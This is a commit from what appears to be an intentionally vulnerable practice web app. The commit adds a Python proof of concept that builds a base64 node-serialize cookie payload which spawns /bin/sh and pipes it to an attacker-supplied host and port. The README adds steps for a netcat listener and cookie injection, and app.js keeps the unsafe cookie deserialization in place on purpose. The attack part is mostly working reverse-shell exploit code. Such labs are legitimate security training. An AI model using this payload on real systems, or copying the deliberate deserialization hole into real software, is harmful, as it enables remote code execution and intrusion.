Deserialization exploit added

bmdyy · Mar 21, 2021 · 12dda29 · 12dda29
1 parent 5f87f0d
commit 12dda29
Show file tree

Hide file tree

Showing 3 changed files with 32 additions and 6 deletions.
diff --git a/.exploit/README.md b/.exploit/README.md
@@ -11,5 +11,10 @@ The passwords used in this app are weak on purpose, any the hashes can be looked
 ## Deserialization (RCE)
 The draft feature uses a vulnerable node package (`node-serialize`), which is vulnerable to arbitrary code execution.
 
-- PoC: `...`
-- Usage: `...`
+- PoC: `deserialize.py`
+- Usage: 
+  1. `python3 deserialize.py attackip attackerport` and copy the output
+  2. Set up a netcat listener locally: `nc -nvlp attackerport`
+  3. Create / edit the `draft` cookie, set the contents the the output we just copied (**Make sure there are no trailing whitespace characters**)
+  4. Reload the home page / Log in
+  5. The site will deserialize the cookie and set the message input box to the contents of `.msg`, subsequently running our reverse shell at the same time
diff --git a/.exploit/deserialize.py b/.exploit/deserialize.py
@@ -0,0 +1,21 @@
+#!/usr/bin/python3
+import base64
+import sys
+
+if len(sys.argv) != 3:
+	print('usage: %s lhost lport'%sys.argv[0])
+	sys.exit(-1)
+
+lhost = sys.argv[1]
+lport = sys.argv[2]
+
+payload = b'{"msg":"_$$ND_FUNC$$_function(){'
+payload += b'var net = require(\'net\'),cp = require(\'child_process\'),'
+payload += b'sh = cp.spawn(\'/bin/sh\',[]); var client= new net.Socket();'
+payload += b'client.connect(%s, \'%s\', function() {'%\
+	(lport.encode('utf-8'),lhost.encode('utf-8'))
+payload += b'client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);'
+payload += b'});return /rce/'
+payload += b'}()"}'
+
+print(base64.b64encode(payload).decode('utf-8'))
diff --git a/app.js b/app.js
@@ -42,10 +42,6 @@ app.use(cookieParser());
  */
 app.get('/', function(req, res) {
     console.log('[*] ' + req.ip + ' > GET /');
-    var draft = null;
-    if (req.cookies.draft) {
-        draft = serialize.unserialize(new Buffer(req.cookies.draft, 'base64').toString()).msg;
-    }
     MongoClient.connect(db_url, { useNewUrlParser:true, useUnifiedTopology:true }, function(err, db) {
         if (err) {
             throw err;
@@ -72,6 +68,10 @@ app.get('/', function(req, res) {
             if (err) {
                 throw err;
             }
+            var draft = null;
+            if (req.session.logged_in && req.cookies.draft) {
+                draft = serialize.unserialize(new Buffer(req.cookies.draft, 'base64').toString()).msg;
+            }
             res.render('pages/index', {messages: result, session: req.session, draft:draft});
             db.close();
         });